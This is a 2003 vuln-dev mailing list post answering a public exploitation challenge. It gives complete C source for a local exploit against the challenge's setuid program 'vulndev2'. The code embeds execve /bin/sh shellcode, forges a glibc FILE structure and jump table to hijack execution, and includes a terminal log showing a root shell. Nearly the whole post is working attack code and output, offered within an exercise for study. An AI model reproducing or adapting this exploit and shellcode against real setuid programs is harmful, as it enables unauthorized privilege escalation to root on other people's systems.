Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2
From: "D." <dugely () yahoo com>
Date: Sat, 24 May 2003 04:59:35 -0700 (PDT)
Hello vuln-dev! Attached is an exploit for vulndev2.c, or you can download it here: http://www.hcsw.org/sploits/vulndev2sploit.c This was a fun challenge and I hope there are lots of interesting posts about it as well as many more interesting challenges in the future! Doug Hoyte Hypervivid Solutions, Inc __________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com
/* vulndev2.c exploit - (C) 2003 Doug Hoyte and Hypervivid Solutions, Inc www.hypervivid.com www.hcsw.org fractal@efnet doug@saturn:~/devel/vulndev$ uname -mnrsp Linux saturn 2.4.19 i686 unknown doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2sploit vulndev2sploit.c doug@saturn:~/devel/vulndev$ gcc -Wall -g -o vulndev2 vulndev2.c doug@saturn:~/devel/vulndev$ su Password: root@saturn:/home/doug/devel/vulndev# chown root vulndev2 root@saturn:/home/doug/devel/vulndev# chgrp root vulndev2 root@saturn:/home/doug/devel/vulndev# chmod a+rxs vulndev2 root@saturn:/home/doug/devel/vulndev# exit doug@saturn:~/devel/vulndev$ ls -al vulndev2 -rwsr-sr-x 1 root root 18373 May 24 04:16 vulndev2 doug@saturn:~/devel/vulndev$ ./vulndev2sploit ./vulndev2 bffff86c [*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com [*] Using offset bffff86c [*] Removing old log file 'db.log' [*] Sploiting... ;;Ìøÿ¿;; sh-2.05a# whoami root sh-2.05a# exit doug@saturn:~/devel/vulndev$ */ #include <unistd.h> #include <ctype.h> #include <stdio.h> /* my strtok's, well... don't ask */ int my_hatoi(char *tp) { int t=0; char tc; if (tp[0]=='0' && tp[1]=='x') tp+=2; while(isxdigit(tc = tolower(*tp))) { if (isdigit(tc)) t = (t<<4) + (tc - '0'); else t = (t<<4) + (tc - 'a' + 10); tp++; } return t; } int main (int argc, char *argv[]) { // shellcode for Linux/x86 by Aleph Null char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char sploit1[2000]; char sploit2[100]; int i, ADDR_OF_BUF, *tp; printf("\n[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com\n\n"); if (argc != 3) { printf(" Usage: %s <path to vulndev2> <offset>\n", argv[0]); printf(" Offset should be the location in memory of the 'buf' variable\n\n"); return 0; } ADDR_OF_BUF = my_hatoi(argv[2]); printf("[*] Using offset %x\n\n", ADDR_OF_BUF); /* Remove the old log file */ printf("[*] Removing old log file 'db.log'\n\n"); unlink("db.log"); // Everything to 'a's memset(sploit1, 'a', sizeof(sploit1)); // Set BFP to point 2 bytes before F1 (so those damn semi-colons don't get in the way) *((int*)(sploit1+92)) = ADDR_OF_BUF-4-2; // The magic number for FILE structs on glibc is 0xfBAD! Dig? tp = (int*) (sploit1+96); tp[0] = 0xFBAD0101; // The FILE struct BS, we don't really care: we just want the ... for(i=1;i<40;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4)); // ... jump table for(i=40;i<48;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4)+(8*4)); // Tag the shell code on at the end memcpy(sploit1+96+(40*4)+(8*4), shellcode, sizeof(shellcode)); // Use arg #2 to point F1 to our FILE struct memset(sploit2, '\0', sizeof(sploit2)); *((int*)sploit2) = ADDR_OF_BUF+96; // There's a bad moon on the rise... printf("[*] Sploiting...\n\n"); execl(argv[1], argv[1], sploit1, sploit2, NULL); return 0; }
Current thread:
- Re: [Vuln-dev Challenge] Challenge #2, (continued)
- Re: [Vuln-dev Challenge] Challenge #2 anon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 spacewalker (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Robert Hogan (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Gera's Insecure Programing abo7 sin (May 30)
- N00b questions :\ Diode Trnasistor (May 24)
- Re: N00b questions :\ Janus N. (May 24)
- Re: N00b questions :\ northern snowfall (May 24)
- Re: N00b questions :\ Janus N. (May 24)
- Re: N00b questions :\ northern snowfall (May 24)
- Re: N00b questions :\ Diode Trnasistor (May 25)